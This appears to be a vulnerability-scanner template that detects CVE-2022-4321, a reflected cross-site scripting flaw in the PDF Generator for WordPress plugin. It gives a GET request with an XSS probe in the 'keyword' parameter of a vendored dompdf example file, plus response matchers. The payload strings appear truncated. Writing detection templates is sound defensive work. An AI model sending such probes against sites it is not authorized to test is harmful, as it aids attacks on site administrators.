id: CVE-2022-4321 info: name: PDF Generator for WordPress < 1.1.2 - Cross Site Scripting author: r3Y3r53,HuTa0 severity: medium description: | The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress website, potentially leading to unauthorized access, data theft, or further compromise of the website. remediation: Fixed in version 1.1.2 reference: - https://wpscan.com/vulnerability/6ac1259c-86d9-428b-ba98-7f3d07910644 - https://nvd.nist.gov/vuln/detail/CVE-2022-4321 - https://wordpress.org/plugins/pdf-generator-for-wp/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4321 cwe-id: CWE-79 epss-score: 0.00071 epss-percentile: 0.29156 cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: wpswings product: pdf_generator_for_wordpress framework: wordpress publicwww-query: "/wp-content/plugins/pdf-generator-for-wp" tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=">' matchers-condition: and matchers: - type: word part: body words: - '>' - 'pdf-generator-for-wp' - 'Total execution time is' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a00473045022100f8103f7ef8868e72da0087ba6c89753c9b3e3dcb9b4c4ec35fe8312ed3e4da0f02204ec3ee3cbcecf054ab393c3686820340df9329b731d3c16645109896e8b6918f:922c64590222798bb761d5b6d8e72950